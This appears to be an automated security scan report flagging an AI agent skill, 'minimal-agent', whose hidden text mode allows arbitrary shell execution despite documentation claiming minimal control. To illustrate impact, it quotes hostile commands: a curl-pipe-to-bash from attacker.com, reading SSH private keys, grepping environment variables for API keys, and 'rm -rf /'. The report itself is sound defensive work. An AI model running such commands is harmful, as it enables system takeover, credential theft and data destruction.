High risk: risk score 75/100
Last scanned: 1 day ago
minimal-agent
Minimal AI OS control agent (as claimed); in practice it provides unrestricted command execution
Skill declares minimal OS control capabilities but secretly implements unrestricted arbitrary command execution through undocumented V1/text mode, enabling full system compromise.
Skill name: minimal-agent
Analysis time: 50.4s
Engine: pi
Do not install this skill
DO NOT USE. The skill documents controlled hardware automation but actually enables unrestricted shell execution, arbitrary file operations, and network access with no guardrails. If a restricted OS control agent is needed, implement with explicit tool allowlisting and remove text/V1 mode entirely.

Attack chain: 7 steps

Privilege escalation: Skill marketed as a minimal OS control agent with window management and hardware control (SKILL.md:1)
Privilege escalation: V1/text mode documented as a 'development/debugging' feature without emphasizing unrestricted command execution (SKILL.md:65)
Privilege escalation: Attacker forces V1 mode via the --text flag or config mode='force_text' (scripts/agent.py:444)
Privilege escalation: execute_raw_command() passes arbitrary input to a shell=True subprocess (scripts/agent.py:459)
Impact: Attacker executes 'curl https://attacker.com/shell.sh | bash' for a reverse shell (scripts/agent.py:459)
Impact: Attacker executes 'cat ~/.ssh/id_rsa' to steal SSH keys (scripts/agent.py:459)
Impact: Attacker executes 'env | grep API' to harvest credentials (scripts/agent.py:459)

Security findings: 6 items

Severity · Finding · Location
Critical
Unrestricted Arbitrary Command Execution via V1 Mode (Code execution)
The skill implements a 'V1/text mode' that allows execution of ANY shell command, but this is not declared in allowed-tools. The documentation only mentions 'minimal OS control' with controlled hardware operations, yet the actual code exposes unlimited command execution.
subprocess.run(command_str, shell=True, capture_output=True, text=True, timeout=30)
→ Remove V1/text mode entirely or declare it explicitly in allowed-tools with shell:ADMIN level. The function-calling V2 mode with 55 predefined tools should be the only permitted execution path.
scripts/agent.py:459
Critical
Documentation Mismatch: Claims Minimal Control But Enables Full System Access (Documentation deception)
SKILL.md describes this as a '极简 AI 操作系统控制代理' (minimal AI OS control agent) for window management, process control, hardware operations, GUI automation, serial communication, and IoT control. However, the V1 mode documented in SKILL.md enables unrestricted command execution including: file operations, script execution, network operations, database operations, system management, software installation, and security operations.
In **V1 (text) mode**, Minimal Agent can execute **any system command**
→ Either remove V1 mode entirely or prominently document that this skill can execute arbitrary system commands with full system access.
SKILL.md:67
High
Direct Shell Injection via User Input (Code execution)
The execute_raw_command() function passes user input directly to shell=True without any sanitization or validation. Commands like 'python agent.py --text "rm -rf /"' would execute immediately.
result = subprocess.run(command_str, shell=True, ...)
→ Implement strict input validation and allowlisting. If arbitrary command execution is truly needed, use shell=False with explicit command/argument separation.
scripts/agent.py:459
High
Undeclared Elevated Permissions (Privilege escalation)
The skill declares filesystem:WRITE and shell:WRITE, but V1 mode actually provides filesystem:ADMIN and shell:ADMIN equivalent capabilities, enabling: user management, service control, registry editing, firewall configuration, software installation/removal.
System management: user management, service control, registry editing
→ Declare the actual permission level (ADMIN) for filesystem and shell resources, or remove these dangerous capabilities.
SKILL.md:87
Medium
Python venv Path Hardcoded with User Home Directory (Code obfuscation)
Line 114 hardcodes 'C:\Users\wave\.workbuddy\binaries\python\envs\default\Scripts\python.exe' which could be leveraged for persistence or DLL hijacking attacks.
PYTHON_VENV = r"C:\Users\wave\.workbuddy\binaries\python\envs\default\Scripts\python.exe"
→ Use relative paths or configurable paths instead of hardcoding absolute paths to user directories.
scripts/agent.py:114
Medium
Potential Environment Variable Access for API Keys (Credential theft)
V1 mode can execute commands like 'env' or 'printenv' to extract API keys, tokens, and other secrets from environment variables. This is not declared in allowed-tools.
shell=True enables access to os.environ
→ If environment variable access is needed, explicitly declare it and implement safeguards against exfiltration.
scripts/agent.py:459
Resource type          Declared  Inferred    Status           Evidence
Command execution      WRITE     WRITE       ✓ consistent     agent.py:run_script() uses subprocess
Filesystem             WRITE     WRITE       ✓ consistent     agent.py + V1 mode enables any file operation
Network access         READ      READ_WRITE  ✗ over-privileged
Database               NONE      WRITE       ✗ over-privileged
Environment variables  NONE      READ        ✗ over-privileged
Skill invocation       NONE      WRITE       ✗ over-privileged
3 findings (external URLs)
Medium · External URL: https://skillhub.tencent.com/skills/system-controller (SKILL.md:262)
Medium · External URL: https://clawhub.ai/wangjiaocheng/system-controller (SKILL.md:271)
Medium · External URL: https://clawhub.ai/wangjiaocheng/system-controller/archive/main.zip (SKILL.md:275)

Directory structure

3 files · 49.5 KB · 1255 lines
Python: 1 file · 938 lines; Markdown: 1 file · 293 lines; TOML: 1 file · 24 lines
├─ 📁 scripts
│ ├─ 🐍 agent.py Python 938L · 35.9 KB
│ └─ 📄 config.toml TOML 24L · 1.1 KB
└─ 📝 SKILL.md Markdown 293L · 12.5 KB

Dependency analysis: 2 items

Package     Version  Source  Known vulnerabilities  Notes
subprocess  stdlib   Python                         Standard library only
tomllib     stdlib   Python                         Standard library only

Security highlights

✓ V2/function-calling mode provides controlled execution with 55 predefined tools
✓ Dangerous operations (power_shutdown, process_kill, network_disable) have confirmation prompts in V2 mode
✓ Configuration allows disabling auto mode fallback to V1
✓ Timeout limits (30s) prevent indefinite command execution